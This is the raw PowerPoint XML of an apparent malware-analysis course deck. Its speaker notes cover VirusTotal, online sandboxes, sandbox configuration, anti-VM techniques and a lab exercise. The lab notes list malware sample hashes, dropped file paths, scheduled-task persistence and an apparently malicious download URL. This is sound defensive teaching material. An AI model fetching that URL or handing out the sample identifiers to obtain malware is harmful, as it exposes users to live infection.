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81"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId6"/>
    <p:sldId id="363" r:id="rId7"/>
    <p:sldId id="258" r:id="rId8"/>
    <p:sldId id="259" r:id="rId9"/>
    <p:sldId id="323" r:id="rId10"/>
    <p:sldId id="282" r:id="rId11"/>
    <p:sldId id="283" r:id="rId12"/>
    <p:sldId id="285" r:id="rId13"/>
    <p:sldId id="284" r:id="rId14"/>
    <p:sldId id="349" r:id="rId15"/>
    <p:sldId id="366" r:id="rId16"/>
    <p:sldId id="367" r:id="rId17"/>
    <p:sldId id="286" r:id="rId18"/>
    <p:sldId id="287" r:id="rId19"/>
    <p:sldId id="327" r:id="rId20"/>
    <p:sldId id="328" r:id="rId21"/>
    <p:sldId id="332" r:id="rId22"/>
    <p:sldId id="335" r:id="rId23"/>
    <p:sldId id="336" r:id="rId24"/>
    <p:sldId id="337" r:id="rId25"/>
    <p:sldId id="338" r:id="rId26"/>
    <p:sldId id="350" r:id="rId27"/>
    <p:sldId id="358" r:id="rId28"/>
    <p:sldId id="359" r:id="rId29"/>
    <p:sldId id="360" r:id="rId30"/>
    <p:sldId id="353" r:id="rId31"/>
    <p:sldId id="354" r:id="rId32"/>
    <p:sldId id="357" r:id="rId33"/>
    <p:sldId id="355" r:id="rId34"/>
    <p:sldId id="356" r:id="rId35"/>
    <p:sldId id="288" r:id="rId36"/>
    <p:sldId id="290" r:id="rId37"/>
    <p:sldId id="291" r:id="rId38"/>
    <p:sldId id="294" r:id="rId39"/>
    <p:sldId id="295" r:id="rId40"/>
    <p:sldId id="292" r:id="rId41"/>
    <p:sldId id="296" r:id="rId42"/>
    <p:sldId id="364" r:id="rId43"/>
    <p:sldId id="365" r:id="rId44"/>
    <p:sldId id="297" r:id="rId45"/>
    <p:sldId id="298" r:id="rId46"/>
    <p:sldId id="299" r:id="rId47"/>
    <p:sldId id="361" r:id="rId48"/>
    <p:sldId id="300" r:id="rId49"/>
    <p:sldId id="301" r:id="rId50"/>
    <p:sldId id="303" r:id="rId51"/>
    <p:sldId id="304" r:id="rId52"/>
    <p:sldId id="305" r:id="rId53"/>
    <p:sldId id="306" r:id="rId54"/>
    <p:sldId id="307" r:id="rId55"/>
    <p:sldId id="261" r:id="rId56"/>
    <p:sldId id="308" r:id="rId57"/>
    <p:sldId id="281" r:id="rId58"/>
    <p:sldId id="309" r:id="rId59"/>
    <p:sldId id="310" r:id="rId60"/>
    <p:sldId id="368" r:id="rId61"/>
    <p:sldId id="369" r:id="rId62"/>
    <p:sldId id="370" r:id="rId63"/>
    <p:sldId id="371" r:id="rId64"/>
    <p:sldId id="372" r:id="rId65"/>
    <p:sldId id="373" r:id="rId66"/>
    <p:sldId id="374" r:id="rId67"/>
    <p:sldId id="375" r:id="rId68"/>
    <p:sldId id="311" r:id="rId69"/>
    <p:sldId id="313" r:id="rId70"/>
    <p:sldId id="314" r:id="rId71"/>
    <p:sldId id="315" r:id="rId72"/>
    <p:sldId id="316" r:id="rId73"/>
    <p:sldId id="317" r:id="rId74"/>
    <p:sldId id="318" r:id="rId75"/>
    <p:sldId id="319" r:id="rId76"/>
    <p:sldId id="325" r:id="rId77"/>
    <p:sldId id="320" r:id="rId78"/>
    <p:sldId id="321" r:id="rId79"/>
    <p:sldId id="326" r:id="rId8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086" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="80" d="100"/>
          <a:sy n="80" d="100"/>
        </p:scale>
        <p:origin x="-1848" y="-11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80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide75.xml"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="notesMasters/notes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B97622-6677-4EED-B746-4A9B3473D2DE}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>1/7/15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3EE01F-8C47-41E7-A336-DD2FB67B46FB}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1997102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file-analyzer.net/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.document-analyzer.net/"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handlers.sans.org/tliston/ThwartingVMDetection_Liston_Skoudis.pdf" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://sites.google.com/site/chitchatvmback/backdoor" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://my.opera.com/jaelanicu/blog/2008/04/02/a-better-red-pill-scooby-for-vmware" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://my.opera.com/jaelanicu/blog/just-another-vm-detection-was-vm-detection-combo" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.honeynet.org/book/export/html/56" TargetMode="External"/><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7D4FD1-97C0-4CC6-BFE7-8554AA4E42E2}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>1</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5122" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="685800"/>
            <a:ext cx="6096000" cy="3429000"/>
          </a:xfrm>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5123" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="617037">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2158076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834E27A-11AA-F340-9F99-D715EB6E2F37}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>16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23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="263073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25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="347346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weeks campaign</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> gained an average of more than 250K</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28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="404093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31</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32</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VirusTotal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> is an online comparative scanner.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Pros &amp; Cons</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Fast check against multiple engines</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Helps the community</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Out of context, static scans</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Go through the tabs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Industry sharing continues</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>However, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>VirusTotal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> is a business and has a for-fee intelligence portal, which offers additional statistics, sample downloading, submission details, advanced searching, notifications, and clustering</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Click link: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>b8e2bd928293996242a3ebcb1e2aa1b3</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Conflicting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> detection names, what does this malware do?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>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33</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Pros and Cons</a:t>
            </a:r>
          </a:p>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34</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Wepawet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Comodo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Joe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> Sandbox – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.file-analyzer.net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://www.document-analyzer.net/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FA3EE01F-8C47-41E7-A336-DD2FB67B46FB}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>35</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a matter of if, but when you will get infected</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36</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 hands, how many people have done some malware analysis?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>How many have removed a threat from a family member or friend’s system?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>History of malware? Copyright protection – Morris Worm – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Stuxnet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> - Wiper</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Malware comes in all shapes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> and sizes, but our goal is for it to look like the last slide, where users are alerted before it has a chance to do any harm.</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4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1745824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37</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Bait =</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> baseline files, but also applications and services (network) that the sample may be expecting</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40</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41</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the VM reach the internet?  Host files?  Other</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> systems on the network?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Is malware able to determine the MAC address is in the assigned range of a VM vendor?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Is Windows Defender enabled?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Are bait files present?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Do DNS queries resolve?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Do arbitrary HTTP requests result in a web page loading?</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42</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="362454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Cryptowall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> 2.0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>ransomware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> P2P anti-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>vm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> code 2015/01/06</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43</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3153484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Also</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> configure windows to be most useful</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aseline="0" dirty="0" smtClean="0"/>
              <a:t>show hidden files</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aseline="0" dirty="0" smtClean="0"/>
              <a:t>show extensions, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>etc</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hlinkClick r:id="rId3"/>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hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://handlers.sans.org/tliston/ThwartingVMDetection_Liston_Skoudis.pdf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" kern="0" dirty="0" smtClean="0">
              <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://sites.google.com/site/chitchatvmback/backdoor</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>http://my.opera.com/jaelanicu/blog/2008/04/02/a-better-red-pill-scooby-for-vmware</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>http://my.opera.com/jaelanicu/blog/just-another-vm-detection-was-vm-detection-combo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>http://www.honeynet.org/book/export/html/56</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FA3EE01F-8C47-41E7-A336-DD2FB67B46FB}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>44</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45</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="362454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anything visually</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> appear?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Can warnings and errors be trusted?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>If Windows does not find any malicious system changes, what does that mean?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Consider adding another sample after this one that is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> harder to find system changes with OS tools.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Using</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>hardened image/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Find a suitable sample (0012b0384774e51acd053c0f6b1dd112 modified to DCDE32A1B048B9DE8EE5778851D0E465)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Get students thinking creatively.  Tools are not always available/reliable on the host once malware is installed, without anything other than the OS and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>FakeNet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>, what can we observe/learn</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>With </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>FakeNet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> turned on:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Run sample as admin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>What was observed (no UI, no errors)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>What happened? (downloaded an EXE and ran it)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>	c:\ntldrs\funbots.bat</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>	c:\ntldrs\svchest.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>	A bunch of scheduled tasks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>	c:\program files\tongji2.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>	Task Manager </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>-line </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>params</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> shows http://timeless888.com/tong.htm, as well as spawning processes SCODEF and CREDAT (PID &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>ChildFrame</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> ID)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>	Modified HOSTS file, what for?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>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dirty="0" smtClean="0"/>
              <a:t>What native applications can we use?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Task Manager or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>tasklist</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Windows Search for New and Modified files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>AT command for scheduled tasks, or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>taskschd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>schtasks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>MSCONFIG for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Autoruns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> (none here)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Ipconfig</a:t>
            </a:r>
            <a:r>
